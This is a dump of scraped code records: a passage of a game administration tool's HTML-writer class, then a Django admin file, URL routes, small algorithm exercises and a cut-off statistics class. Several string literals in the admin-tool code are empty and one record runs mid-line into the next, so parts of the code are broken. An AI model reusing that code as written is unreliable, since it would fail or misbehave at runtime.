self.HTMLEncode(linkText)\n if itemID is None:\n return ''\n else:\n return self.Link('/gd/universe.py', linkText, {'action': 'Map',\n 'itemID': itemID}, props)\n\n def MissionLink(self, contentID, linkText = None, props = ''):\n if contentID in self.cache.Index(const.cacheAgtContentTemplates):\n r = self.cache.Index(const.cacheAgtContentTemplates, contentID)\n if linkText is None:\n t = r.contentTemplate\n t = t[t.find('_') + 1:]\n linkText = localization.GetByMessageID(r.contentNameID)\n return '%s - %s' % (t, self.Link('/gd/agents.py', linkText, {'action': 'CreateOrEditContent',\n 'contentID': contentID,\n 'contentTemplate': r.contentTemplate,\n 'edit': 0}))\n else:\n return self.FontRed('Mission not found')\n\n def RewardLink(self, rewardID, linkText = None, props = ''):\n if linkText is None:\n row = self.DB2.SQLInt('name', 'reward.rewards', '', '', 'rewardID', rewardID)\n if len(row) == 0:\n return 'Deleted reward'\n linkText = row.name\n if linkText is not None:\n linkText = self.HTMLEncode(linkText)\n return self.Link('/gd/rewards.py', linkText, {'action': 'ViewReward',\n 'rewardID': rewardID}, props)\n\n def PinLink(self, pinID, linkText = None, props = ''):\n pinName = linkText\n if pinName is None:\n pinRow = self.DB2.SQLBigInt('typeID', 'planet.pins', '', '', 'pinID', pinID)\n if len(pinRow) == 0:\n return 'Deleted pin'\n pinName = cfg.invtypes.Get(pinRow[0].typeID).name\n if pinName is not None:\n pinName = self.HTMLEncode(pinName)\n return self.Link('/gm/planets.py', pinName, {'action': 'ViewPin',\n 'pinID': pinID}, props)\n\n def PinTypeLink(self, pinID, linkText = None, props = ''):\n pinRow = self.DB2.SQLBigInt('typeID', 'planet.pins', '', '', 'pinID', pinID)[0]\n pinTypeID = pinRow.typeID\n pinName = linkText\n if pinName is None:\n pinName = cfg.invtypes.Get(pinRow.typeID).name\n if pinName is not None:\n pinName = self.HTMLEncode(pinName)\n return self.TypeLink(pinTypeID, linkText=pinName, props=props)\n\n def SchematicLink(self, schematicID, linkText = None, props = ''):\n schematicName = linkText\n if schematicName is None:\n schematicName = cfg.schematics.Get(schematicID).schematicName\n if schematicName is not None:\n schematicName = self.HTMLEncode(schematicName)\n return self.Link('/gd/schematics.py', schematicName, {'action': 'View',\n 'schematicID': schematicID})\n\n def RecipeLink(self, parentID, parentType, text = None):\n if text is None:\n text = self.HTMLEncode(text)\n if parentType == const.cef.PARENT_TYPEID:\n text = cfg.invtypes.Get(parentID).typeName\n elif parentType == const.cef.PARENT_GROUPID:\n text = cfg.invgroups.Get(parentID).groupName\n else:\n text = cfg.invcategories.Get(parentID).categoryName\n if text is not None:\n text = self.HTMLEncode(text)\n return self.Link('/gd/entities.py', text, {'action': 'Recipe',\n 'parentID': parentID,\n 'parentType': parentType})\n\n def SystemHeader(self, systemID, smallHeader = 1, menuPlacement = 'rMenu'):\n s = self.cache.Row(const.cacheEspSolarSystems, systemID)\n if s.factionID is None:\n image = '/img/system.jpg'\n else:\n image = '/img/faction%s.jpg' % s.factionID\n lines = []\n lines.append([1, 'Constellation', self.ConstellationLink(s.constellationID)])\n lines.append([1, 'Region', self.RegionLink(s.regionID)])\n if smallHeader == 0 and s.combatZoneID:\n combatZoneName = self.cache.IndexText(const.cacheFacWarCombatZones, s.combatZoneID)\n lines.append([0, 'Combat Zone', self.Link('/gd/combatZones.py', combatZoneName, {'action': 'Zone',\n 'zoneID': s.combatZoneID})])\n if s.factionID:\n lines.append([0, 'Faction', self.FactionLink(s.factionID)])\n lines.append([0, 'Security', s.security])\n self.SubjectHeader(smallHeader, 'SYSTEM', systemID, s.solarSystemName, '#FFFF80', image, '/gd/universe.py', 'System', 'systemID', lines)\n li = []\n li.append('#SYSTEM')\n li.append(self.Link('/gd/universe.py', 'INFO', {'action': 'System',\n 'systemID': systemID}))\n li.append('-')\n li.append(self.Link('/gd/universe.py', 'Population and Park Load', {'action': 'PopulationParkLoad',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Jumps', {'action': 'Jumps',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Stations', {'action': 'Stations',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Sovereignty Structures', {'action': 'SovereigntyStructures',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Starbases', {'action': 'Starbases',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Celestials', {'action': 'Celestials',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Moons', {'action': 'Moons',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Asteroid Belts', {'action': 'AsteroidBelts',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Asteroids', {'action': 'Asteroids',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Constellation Map', {'action': 'Map',\n 'itemID': s.constellationID}))\n li.append(self.Link('/gd/universe.py', 'Development Indices', {'action': 'DevelopmentIndices',\n 'systemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Cargo Links', {'action': 'SystemCargoLinks',\n 'systemID': systemID}))\n li.append(self.Link('/gm/logs.py', 'Events', {'action': 'ItemEvents',\n 'itemID': systemID}))\n li.append(self.Link('/gd/universe.py', 'Factional Warfare', {'action': 'FactionalWarfare',\n 'systemID': systemID}))\n li.append(self.Link('/gm/inventory.py', 'Find Item', {'action': 'FindItem',\n 'locationID': systemID}))\n if session.role & (ROLE_GMH | ROLE_CONTENT | ROLE_ADMIN) > 0:\n li.append(self.Link('/gd/universe.py', 'Free Slots', {'action': 'FreeSlots',\n 'systemID': systemID}))\n if session.role & ROLE_CONTENT > 0:\n li.append(self.Link('/gd/universe.py', 'Product Distributions', {'action': 'ProductDistributions',\n 'systemID': systemID}))\n li.append(self.Link('/info/map.py', 'List Pilots', {'action': 'PilotsInSolarSystem',\n 'solarSystemID': systemID}))\n li.append(self.Link('/info/map.py', 'Map Details', {'action': 'MapDetails',\n 'solarSystemID': systemID}))\n if session.role & ROLE_CONTENT > 0:\n li.append('-')\n editText = self.Link('/gd/universe.py', 'EDIT', {'action': 'SolarSystemEditForm',\n 'solarSystemID': systemID})\n rs = self.DB2.SQLInt('*', 'map.solarSystems', '', '', 'solarSystemID', systemID)\n if len(rs) > 0:\n editText += self.MidDot()\n editText += self.RevisionLink(rs[0])\n li.append(editText)\n li.append('-')\n li.append(self.FontGray('Dungeons and Complexes'))\n li.append('>' + self.Link('/gd/universe.py', 'Dungeons', {'action': 'DungeonList',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Distributions', {'action': 'DungeonDistributions',\n 'solarSystemID': systemID}))\n li.append('>' + self.Link('/gd/universe.py', 'Spawnpoints', {'action': 'Spawnpoints',\n 'systemID': systemID}) + self.MidDot() + self.Link('/gd/universe.py', 'Agent Spawnpoints', {'action': 'AgentSpawnpoints',\n 'systemID': systemID}))\n li.append('-')\n li.append(self.FontGray('Cluster'))\n li.append('>' + self.Link('/gd/universe.py', 'Go to System Node', {'action': 'GotoNodeFromSolarSystemID',\n 'solarSystemID': systemID}))\n li.append('>' + self.Link('/admin/network.py', 'Node History', {'action': 'AddressDetails',\n 'serviceID': 2,\n 'addressID': systemID}))\n self.SubjectActions(li, menuPlacement)\n return s\n\n def PlanetHeader(self, planetID, smallHeader = 1, menuPlacement = 'rMenu'):\n p = self.DB2.SQLInt('*', 'map.worldDx', '', '', 'itemID', planetID)[0]\n lines = []\n lines.append([1, 'System', self.SystemLink(p.solarSystemID)])\n lines.append([1, 'Constellation', self.ConstellationLink(p.constellationID)])\n lines.append([1, 'Region', self.RegionLink(p.regionID)])\n self.SubjectHeader(smallHeader, 'PLANET', planetID, p.itemName, '#C0C0C0', '/img/celestial.jpg', '/gd/universe.py', 'Planet', 'planetID', lines)\n li = []\n li.append('#PLANET')\n li.append(self.Link('/gd/universe.py', 'INFO', {'action': 'Planet',\n 'planetID': planetID}))\n li.append('-')\n li.append(self.Link('/gd/universe.py', 'Orbit Celestials', {'action': 'OrbitCelestials',\n 'planetID': planetID}))\n li.append(self.Link('/gd/universe.py', 'Customs Offices', {'action': 'CustomsOffices',\n 'planetID': planetID}))\n li.append(self.Link('/gd/universe.py', 'Resource Distributions', {'action': 'ResourceDistributions',\n 'planetID': planetID}))\n li.append('-')\n li.append(self.FontGray('Planetary Interaction'))\n li.append('>' + self.Link('/gm/planets.py', 'Colonies', {'action': 'Colonies',\n 'planetID': planetID}))\n li.append('-')\n li.append(self.FontGray('Cluster'))\n li.append('>' + self.Link('/gm/planets.py', 'Go to Planet Node', {'action': 'GotoNodeForPlanetID',\n 'planetID': planetID,\n 'redirectAction': 'Planet'}))\n li.append('>' + self.Link('/admin/network.py', 'Node History', {'action': 'AddressDetails',\n 'serviceID': 23,\n 'addressID': planetID}))\n self.SubjectActions(li, menuPlacement)\n return p\n\n def ComboRaces(self, allowNone = 0):\n combo = {}\n if allowNone:\n combo[0] = '(none)'\n for r in cfg.races:\n combo[r.raceID] = r.raceName\n\n return combo\n\n def ComboBloodlines(self, allowNone = 0):\n combo = {}\n if allowNone:\n combo[0] = '(none)'\n for b in self.cache.Rowset(const.cacheChrBloodlines):\n r = cfg.races.Get(b.raceID)\n combo[b.bloodlineID] = '%s, %s' % (localization.GetByMessageID(r.raceNameID), localization.GetByMessageID(b.bloodlineNameID))\n\n return combo\n\n def SelectCategory(self, action, categoryID, placement = 'rMenu'):\n categories = []\n for c in cfg.invcategories:\n if c.categoryID > 0:\n bon = ''\n boff = ''\n if c.categoryID == categoryID:\n bon = ''\n boff = ''\n categories.append([c.categoryName, bon + self.Link('', c.categoryName, {'action': action,\n 'categoryID': c.categoryID}) + boff])\n\n categories.sort()\n categories = map(lambda line: line[1:], categories)\n if categoryID is None:\n self.Write(self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 0\n else:\n self.WriteDirect(placement, self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 1\n\n def SelectCategoryGroup(self, action, categoryID, groupID, placement = 'rMenu', webPart = None):\n if categoryID is None and groupID is not None:\n categoryID = cfg.invgroups.Get(groupID).categoryID\n categories = []\n for c in cfg.invcategories:\n if c.categoryID > 0:\n bon = ''\n boff = ''\n if c.categoryID == categoryID:\n bon = ''\n boff = ''\n categories.append([c.categoryName, bon + self.Link('', c.categoryName, {'action': action,\n 'categoryID': c.categoryID}) + boff])\n\n categories.sort()\n categories = map(lambda line: line[1:], categories)\n if categoryID is None:\n self.Write(self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 0\n else:\n groups = []\n for g in cfg.groupsByCategories.get(categoryID, []):\n bon = ''\n boff = ''\n if g.groupID == groupID:\n bon = ''\n boff = ''\n groups.append([g.groupName, bon + self.Link('', g.groupName, {'action': action,\n 'categoryID': categoryID,\n 'groupID': g.groupID}) + boff])\n\n groups.sort()\n groups = map(lambda line: line[1:], groups)\n if groupID is None:\n self.Write(self.WebPart('Groups', self.GetTable([], groups), 'wpGroups'))\n self.WriteDirect(placement, self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 0\n if webPart:\n self.WriteDirect(placement, webPart)\n self.WriteDirect(placement, self.WebPart('Groups', self.GetTable([], groups), 'wpGroups'))\n self.WriteDirect(placement, self.WebPart('Categories', self.GetTable([], categories), 'wpCategories'))\n return 1\n\n def SelectCategoryGroupType(self, action, categoryID, groupID, placement = 'rMenu'):\n if self.SelectCategoryGroup(action, categoryID, groupID, placement):\n li = []\n for t in cfg.typesByGroups.get(groupID, []):\n li.append([t.typeID, self.Link('', t.typeName, {'action': action,\n 'categoryID': categoryID,\n 'groupID': groupID,\n 'typeID': t.typeID})])\n\n self.LinesSortByLink(li, 1)\n self.Write(self.WebPart('Types', self.GetTable(['id', 'name'], li), 'wpTypes'))\n\n def SelectRegion(self, action, regionID):\n li = []\n for r in self.DB2.SQL('SELECT * FROM map.regionsDx ORDER BY regionName'):\n bon = ''\n boff = ''\n if r.regionID == regionID:\n bon = ''\n boff = ''\n li.append([bon + self.Link('', self.IsBlank(r.regionName, r.regionID), {'action': action,\n 'regionID': r.regionID}) + boff])\n\n regSel = self.GetTable([], li)\n if regionID is None:\n self.Write(self.WebPart('Select Region', regSel, 'wpRegSel'))\n return 0\n else:\n self.WriteDirect('rMenu', self.WebPart('Regions', regSel, 'wpRegSel'))\n return 1\n\n def SelectRegionConstellation(self, action, regionID, constellationID):\n if self.SelectRegion(action, regionID):\n li = []\n for c in self.DB2.SQLInt('constellationID, constellationName', 'map.constellationsDx', '', 'constellationName', 'regionID', regionID):\n bon = ''\n boff = ''\n if c.constellationID == constellationID:\n bon = ''\n boff = ''\n li.append([bon + self.Link('', self.IsBlank(c.constellationName, c.constellationID), {'action': action,\n 'regionID': regionID,\n 'constellationID': c.constellationID}) + boff])\n\n conSel = self.GetTable([], li)\n if constellationID is None:\n self.Write(self.WebPart('Select Constellation', conSel, 'wpConSel'))\n return 0\n else:\n self.WriteDirect('rMenu', self.WebPart('Constellations', conSel, 'wpConSel'))\n return 1\n\n def SelectRegionConstellationSolarSystem(self, action, regionID, constellationID, solarSystemID):\n if self.SelectRegionConstellation(action, regionID, constellationID):\n li = []\n for s in self.DB2.SQLInt('solarSystemID, solarSystemName', 'map.solarSystemsDx', '', 'solarSystemName', 'constellationID', constellationID):\n bon = ''\n boff = ''\n if s.solarSystemID == solarSystemID:\n bon = ''\n boff = ''\n li.append([bon + self.Link('', self.IsBlank(s.solarSystemName, s.solarSystemID), {'action': action,\n 'regionID': regionID,\n 'constellationID': constellationID,\n 'solarSystemID': s.solarSystemID}) + boff])\n\n solSel = self.GetTable([], li)\n if solarSystemID is None:\n self.Write(self.WebPart('Select Solar System', solSel, 'wpSolSel'))\n return 0\n else:\n self.WriteDirect('rMenu', self.WebPart('Solar Systems', solSel, 'wpSolSel'))\n return 1\n\n def AddTableItem(self, lines, r, owner, location, category = 0, checkBox = 0):\n t = cfg.invtypes.Get(r.typeID)\n g = cfg.invgroups.Get(t.groupID)\n c = cfg.invcategories.Get(g.categoryID)\n cgtn = str(r.typeID) + ': '\n if category:\n if c.categoryName != g.groupName:\n cgtn += c.categoryName + ', '\n if g.groupName == t.typeName:\n cgtn += self.TypeLink(r.typeID, t.typeName)\n else:\n cgtn += g.groupName + ', ' + self.TypeLink(r.typeID, t.typeName)\n itemName = self.SP.EspItemName(0, r.itemID, r.quantity, r.typeID, t.groupID, g.categoryID)\n if itemName != '':\n cgtn += ': ' + itemName + ''\n attr = ''\n if r.quantity < 0:\n attr += ' S'\n if r.quantity != -1:\n attr += self.FontRed(r.quantity)\n else:\n attr += ' %d' % r.quantity\n line = []\n if checkBox == 1:\n line.append('' % r.itemID + ' ' + self.ItemID(r.itemID))\n else:\n line.append(self.ItemID(r.itemID))\n line.append(cgtn)\n if owner:\n ownerName = self.SP.EspItemName(1, r.ownerID)\n if ownerName == '':\n line.append(self.ItemID(r.ownerID))\n else:\n line.append(self.ItemID(r.ownerID) + ': ' + ownerName)\n if location:\n locationName = self.SP.EspItemName(2, r.locationID)\n if locationName == '':\n line.append(self.ItemID(r.locationID))\n else:\n line.append(self.ItemID(r.locationID) + ': ' + locationName)\n line.append('%d: %s' % (r.flagID, self.config.GetFlags(r.flagID).flagName))\n line.append(attr)\n act = ''\n if t.groupID == const.groupCharacter:\n act = self.CharacterLink(r.itemID, 'Character')\n elif t.groupID == const.groupCorporation:\n act = self.CorporationLink(r.itemID, 'Corporation')\n elif t.groupID == const.groupFaction:\n act = self.FactionLink(r.itemID, 'Faction')\n elif t.groupID == const.groupRegion:\n act = self.RegionLink(r.itemID, 'Region')\n elif t.groupID == const.groupConstellation:\n act = self.ConstellationLink(r.itemID, 'Constellation')\n elif t.groupID == const.groupSolarSystem:\n act = self.SystemLink(r.itemID, 'System')\n elif t.groupID == const.groupStation:\n act = self.StationLink(r.itemID, 'Station')\n elif t.groupID == const.groupControlTower:\n act = self.Link('/gm/starbase.py', 'Starbase', {'action': 'Starbase',\n 'towerID': r.itemID})\n elif t.groupID == const.groupPlanet:\n act = self.Link('/gd/universe.py', 'Planet', {'action': 'Planet',\n 'planetID': r.itemID})\n elif t.groupID == const.groupAsteroidBelt:\n act = self.Link('/gd/universe.py', 'Belt', {'action': 'AsteroidBelt',\n 'asteroidBeltID': r.itemID})\n line.append(act)\n lines.append(line)\n\n def AddTypeSelector(self, form, name = '', depth = 'type'):\n self.WriteScript('\\n function replaceOptions(sElement, newOptions)\\n {\\n for (i=document.all[sElement].length; i > -1; i--)\\n {\\n document.all[sElement].options[i]=null\\n }\\n for (i = 0; i < newOptions.length; i += 2)\\n {\\n document.all[sElement].add(new Option( newOptions[i], newOptions[i+1]))\\n }\\n }\\n ')\n self.WriteScript('c=new ActiveXObject(\"Scripting.Dictionary\");\\n')\n self.WriteScript('g=new ActiveXObject(\"Scripting.Dictionary\");\\n')\n s = htmlwriter.UnicodeMemStream()\n for g in cfg.invgroups:\n self.BeNice()\n if g.groupID not in cfg.typesByGroups:\n continue\n typesByGroup = cfg.typesByGroups[g.groupID].Copy()\n typesByGroup.Sort('typeName')\n s.Write('g.Add(\"%d\", new Array(' % g.groupID)\n for t in typesByGroup:\n self.BeNice()\n typeName = t.typeName.replace('\"', \"'\")\n typeName = typeName.replace('\\n', '')\n typeName = typeName.replace('\\r', '')\n s.Write('\"%s\",%d,' % (str(typeName), t.typeID))\n\n s.Seek(s.pos - 1)\n s.Write('));\\n')\n\n cic = {}\n for c in cfg.invcategories:\n self.BeNice()\n if c.categoryID not in cfg.groupsByCategories:\n continue\n groupsByCategory = cfg.groupsByCategories[c.categoryID].Copy()\n groupsByCategory.Sort('groupName')\n cic[c.categoryID] = c.name\n s.Write('c.Add(\"%d\", new Array(' % c.categoryID)\n for g in groupsByCategory:\n self.BeNice()\n s.Write('\"%s\",%d,' % (str(g.groupName.replace('\"', \"'\")), g.groupID))\n\n s.Seek(s.pos - 1)\n s.Write('));\\n')\n\n s.Seek(0)\n self.WriteScript(str(s.Read()))\n form.AddSelect(name + 'categoryid', cic, 'Category', None, 0, 'onChange=\"replaceOptions(\\'' + name + \"groupid',c(this.options[this.selectedIndex].value)); replaceOptions('\" + name + \"typeid',g(document.all['\" + name + 'groupid\\'].options[0].value))\"')\n if depth == 'type' or depth == 'group':\n form.AddSelect(name + 'groupid', {}, 'Group', None, 0, 'onChange=\"replaceOptions(\\'' + name + 'typeid\\',g(this.options[this.selectedIndex].value))\"')\n if depth == 'type':\n form.AddSelect(name + 'typeid', {}, 'Type')\n\n def QuickLinks(self, text):\n pup = re.compile('charid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n pup = re.compile('userid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n pup = re.compile('itemid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n pup = re.compile('petid\\\\((\\\\d+)\\\\)', re.IGNORECASE)\n text = pup.sub('\\\\1', text)\n return text\n\n def GetOwnerImage(self, ownerType, ownerID, width = 128):\n if ownerType == 'Character':\n extension = 'jpg'\n else:\n extension = 'png'\n serverLink = sm.GetService('machoNet').GetGlobalConfig().get('imageserverurl')\n if serverLink == '':\n return\n if serverLink is None:\n serverLink = 'http://%s.dev.image/' % os.environ.get('USERNAME').replace('.', '_').lower()\n serverLink += '%s/%d_%d.%s'\n return serverLink % (ownerType,\n ownerID,\n width,\n extension)\n\n def GetTransferDelay(self):\n transferDelay = self.cache.Setting('Character', 'TransferDelay')\n if transferDelay == '':\n return 10\n return int(transferDelay)\n\n def GetTransferQueue(self, transferQueue, displayLastEmailChange = False, displayLastPasswordChange = False):\n transferDelay = self.GetTransferDelay()\n header = ['Character',\n 'Old User',\n 'New User',\n 'IP Number',\n 'IP Info',\n 'Transfer Requested',\n 'Transfer Delay Ends']\n if displayLastEmailChange:\n header.append('Old User Email Changed (last 7d)')\n if displayLastPasswordChange:\n header.append('Old User Password Changed (last 7d)')\n lines = []\n for item in transferQueue:\n line = [self.CharacterLink(item.characterID),\n '%s (%s)' % (self.UserLink(item.oldUserID), item.oldUserCountryCode),\n '%s (%s)' % (self.UserLink(item.newUserID), item.newUserCountryCode),\n item.ipNumber,\n self.IPAddress(item.ipNumber),\n util.FmtDate(item.created, 'll'),\n util.FmtDate(item.created + transferDelay * HOUR)]\n if displayLastPasswordChange or displayLastEmailChange:\n SQL = '\\n SELECT count=COUNT(*), columnID\\n FROM (SELECT TOP 100 eventDate, columnID\\n FROM zuser.userEvents\\n WHERE userID = %i\\n ORDER BY eventID DESC) AS RES\\n WHERE eventDate > GETUTCDATE() - 7 AND columnID in (205, 206)\\n GROUP BY columnID'\n displayLastEmailChangeText = ''\n displayLastPasswordChangeText = ''\n for row in self.DB2.SQL(SQL % item.oldUserID):\n if row.columnID == 205:\n displayLastEmailChangeText = 'Yes (%i)' % row.count\n if row.columnID == 206:\n displayLastPasswordChangeText = 'Yes (%i)' % row.count\n\n if displayLastEmailChange:\n line.append(displayLastEmailChangeText)\n if displayLastPasswordChange:\n line.append(displayLastPasswordChangeText)\n lines.append(line)\n\n return self.GetTable(header, lines, useFilter=True)\n\n def GetPickerAgent(self, ctrlID, ctrlLabel = None, minLength = 4):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/agentds.py', minLength=minLength)\n\n def GetPickerType(self, ctrlID, ctrlLabel = None, minLength = 4):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/typeds.py', minLength=minLength)\n\n def GetPickerCharacter(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/characterds.py', minLength=minLength)\n\n def GetPickerOAuthApplication(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/oauthAppds.py', minLength=minLength)\n\n def GetPickerAffiliate(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/affiliateds.py', minLength=minLength)\n\n def GetPickerStation(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/stationds.py', minLength=minLength)\n\n def GetPickerCorporation(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/corporationds.py', minLength=minLength)\n\n def GetPickerRegion(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/regionds.py', minLength=minLength)\n\n def GetPickerConstellation(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/constellationds.py', minLength=minLength)\n\n def GetPickerSolarSystem(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/solarsystemds.py', minLength=minLength)\n\n def GetPickerDistrict(self, ctrlID, ctrlLabel = None, minLength = 3):\n if ctrlLabel is not None:\n ctrlLabel = self.HTMLEncode(ctrlLabel)\n return self.GetAutoComplete(ctrlID, ctrlLabel, callbackPy='/ds/districtds.py', minLength=minLength)\n\n def AppGetAwayStatusTextForCharacter(self, characterID):\n if not characterID:\n return ''\n try:\n afkStatus = ''\n charMod = characterID % const.CHARNODE_MOD\n charNodeID = sm.GetService('machoNet').GetNodeFromAddress(const.cluster.SERVICE_CHARACTER, charMod)\n afkTime = self.session.ConnectToRemoteService('charMgr', charNodeID).IsCharacterAFK(characterID)\n if afkTime:\n diff = blue.os.GetWallclockTime() - afkTime\n afkStatus = ' · Away for %s, since %s' % (util.FmtTimeEng(diff), util.FmtDateEng(afkTime, 'ns'))\n except Exception as e:\n afkStatus = 'Error: %s' % e\n\n return afkStatus\n\n\nif macho.mode == 'server':\n\n class MlsHtmlWriter(ESPHtmlWriter):\n __guid__ = 'htmlwriter.MlsHtmlWriter'\n\n def __init__(self, template = 'script:/wwwroot/lib/template/baseNoRight.html', page = ''):\n ESPHtmlWriter.__init__(self, template, 'MLS', page)\n\n\n class GMHtmlWriter(ESPHtmlWriter):\n __guid__ = 'htmlwriter.GMHtmlWriter'\n\n def __init__(self, template = 'script:/wwwroot/lib/template/base.html', page = ''):\n ESPHtmlWriter.__init__(self, template, 'GM', page)\n\n def WriteLeftMenu(self, action):\n pass\n\n def WriteRightMenu(self):\n pass\n\n def CategorySelector(self, selectName, selectedCategoryID = None, submitOnChange = False):\n categories = []\n parents, childs, descriptions, billinCategories = self.petitioner.GetCategoryHierarchicalInfo()\n for parentID in parents:\n categories.append([parentID, parents[parentID], True])\n for childID in childs[parentID]:\n categories.append([childID, childs[parentID][childID], False])\n\n selectorHTML = ''.format(obj.pk))\n\n delete.allow_tags = True\n delete.short_description ='Delete Profolio'\n def image_tag(self,obj):\n if obj.get_image_video() =='mp4':\n return format_html(f'''\n \n ''')\n else:\n return format_html(f'\"alt\"')\n \n image_tag.allow_tags = True\n image_tag.short_description = 'Image / Video'\n list_per_page = 10\n search_fields = (\"title\",\"technology\")\n list_display = (\"title\",\"technology\",\"image_tag\",\"uploaded_at\",\"delete\")\n list_editable = (\"technology\",)\n\n\nadmin.site.register(Portfolio,PortfolioAdmin)\nadmin.site.register(Career)\nadmin.site.site_header = \"Vcodify Admin Dashboard\"\nadmin.site.site_title = \"Vcodify Admin Dashboard\"\nadmin.site.index_title = \"Welcome to Vcodify Admin Dashboard\"","repo_name":"mapplecode/vcodify","sub_path":"core/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13962841024","text":"from django.conf.urls import url\nimport views\n\nurlpatterns=[\n\turl(r'^$', views.courses),\n\turl(r'^create$', views.create),\n\turl(r'^destory/(?P\\d+)$', views.confirm),\n\turl(r'^destory/(?P\\d+)/remove$', views.remove),\n url(r'^(?P\\d+)/comments$', views.comments),\n\turl(r'^(?P\\d+)/comments/create$', views.create_comments),\n]","repo_name":"arsiag/Django-Courses","sub_path":"apps/courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32178504212","text":"# Given the head of a singly linked list and two integers left and right where left <= right,\n# reverse the nodes of the list from position left to position right, and return the reversed list.\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def reverseBetween(self, head, left, right):\n dummy = ListNode(0)\n dummy.next = head\n\n prev = dummy\n curr = dummy.next\n for i in range(1, left):\n prev = curr\n curr = curr.next\n\n for i in range(right - left):\n temp = curr.next\n curr.next = temp.next\n temp.next = prev.next\n prev.next = temp\n return dummy.next\n","repo_name":"tharun-vemula/programming","sub_path":"Problems/ReverseLinkedList.py","file_name":"ReverseLinkedList.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24744549328","text":"# Given a 32-bit signed integer, reverse digits of an integer.\n\nclass Solution:\n def reverse(self, x: int) -> int:\n if x>0:\n a = int(str(x)[::-1])\n if x<=0: \n a = -1*int(str(x*-1)[::-1])\n \n if a in range(-2**31, (2**31)-1):\n return a\n else:\n return 0\n ","repo_name":"vatsaashwin/Algorithms","sub_path":"reverseInt.py","file_name":"reverseInt.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32841904115","text":"import numpy as np\nimport pandas as pd\nfrom pandas import Series, DataFrame\nfrom scipy import stats\n\nclass Ttest1():\n \"\"\"\n pairwise t-test without any corrections\n first argument is the dataframe with MultiIndex and values to test\n 'gbg': name of groupby column\n 'cpg': name of column to contain groups to be compared with its first group value\n 'value': name of column containing the values to be compared\n 'ctrl': group value in cpg used as control group when doing pairwise comparison\n return 'pvalue', 'psign'\n 'pvalue': dataframe containing p-value from pairwise t-test\n 'psign': convert 'pvalue' dataframe to a new dataframe with '*'\n '': >= 0.05, '*': <0.05>=0.01, '**': <0.01>=0.001, '***': <0.001>=0.0001, '****': <0.0001\n \"\"\"\n \n def __init__(self, df, value):\n self.df = df\n self.value = value\n\n def onetotwo(self, df):\n df1 = df.reset_index(level=['Grp', 'Sample'])\n df1['Grp1'] = df1['Grp'].apply(lambda x: x.split()[1])\n df1['Grp2'] = df1['Grp'].apply(lambda x: x.split()[0])\n df1 = df1.drop('Grp', axis=1)\n df1 = df1.set_index(['Grp1', 'Grp2', 'Sample'], append=True)\n return df1\n\n def ttest_1(self, gbg='Condi', cpg='Treat', ctrl='control'):\n df1 = 